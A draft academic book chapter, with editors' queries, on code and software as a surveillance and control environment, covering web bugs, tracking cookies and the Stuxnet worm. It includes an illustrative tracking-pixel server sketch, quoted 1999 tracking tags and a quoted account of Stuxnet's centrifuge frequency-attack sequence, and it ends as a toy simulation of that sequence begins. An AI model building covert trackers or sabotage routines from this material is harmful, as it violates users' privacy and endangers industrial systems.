This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and one I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking of physical keyboards and trackpads as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally introduced as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy concerns, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
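&lt;br /&gt;
To make the mechanics of these tracking cookies and one-pixel beacons concrete, here is a minimal sketch in Python of what the server behind such a pixel might do. It is illustrative only: the function and variable names are invented for this example, and it is not the code of any actual tracking company. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Hypothetical sketch of a tracking-pixel endpoint (WSGI-style 'environ' dict). &lt;br /&gt;
from http.cookies import SimpleCookie &lt;br /&gt;
import uuid &lt;br /&gt;
 &lt;br /&gt;
def track(environ): &lt;br /&gt;
    # Read back any cookie previously secreted onto this browser. &lt;br /&gt;
    jar = SimpleCookie(environ.get('HTTP_COOKIE', '')) &lt;br /&gt;
    if 'uid' in jar: &lt;br /&gt;
        uid = jar['uid'].value            # returning visitor: the same 'state' &lt;br /&gt;
    else: &lt;br /&gt;
        uid = uuid.uuid4().hex            # first visit: mint a new identifier &lt;br /&gt;
    # Log referrer and browser against the identifier, building exactly &lt;br /&gt;
    # the kind of behavioural profile described above. &lt;br /&gt;
    visit = (uid, environ.get('HTTP_REFERER', ''), environ.get('HTTP_USER_AGENT', '')) &lt;br /&gt;
    print('logged:', visit) &lt;br /&gt;
    # Re-set the cookie so the 'state' persists until it expires. &lt;br /&gt;
    headers = [('Content-Type', 'image/gif'), &lt;br /&gt;
               ('Set-Cookie', 'uid=%s; Max-Age=31536000; Path=/' % uid)] &lt;br /&gt;
    return headers                        # the body would be a 1x1 transparent GIF &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The page itself needs only to embed the pixel, as in the EFF examples below; all of the work happens in the HTTP headers, invisibly to the user. &lt;br /&gt;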
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any)&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on this web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc., is increasingly becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it was ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can also see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
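&lt;br /&gt;
The ‘do not track’ flag itself is technically trivial, which underlines how much of the problem is one of compliance rather than engineering. The following Python fragment is a hypothetical sketch, reusing the invented track() function from the earlier sketch, of what a tracker that chose to honour the header would do: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
def respond(environ): &lt;br /&gt;
    # The opt-out arrives as the HTTP request header 'DNT: 1'. &lt;br /&gt;
    # Respecting it is voluntary: this check has force only if the &lt;br /&gt;
    # tracker chooses to run it (W3C, 2012). &lt;br /&gt;
    if environ.get('HTTP_DNT') == '1': &lt;br /&gt;
        return []                 # user opted out: set no cookie, log nothing &lt;br /&gt;
    return track(environ)         # otherwise, business as usual &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;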
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet worm, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
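&lt;br /&gt;
The attack sequence Zetter describes can be restaged as a toy simulation. The sketch below, in Python, takes its frequencies and intervals from the quotation above; everything else (the names, the structure, the callback functions) is invented for illustration and bears no relation to the actual Stuxnet code, which was written for Siemens PLCs: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
from time import sleep &lt;br /&gt;
 &lt;br /&gt;
NOMINAL = 1064          # Hz: nominal IR-1 centrifuge operating frequency &lt;br /&gt;
 &lt;br /&gt;
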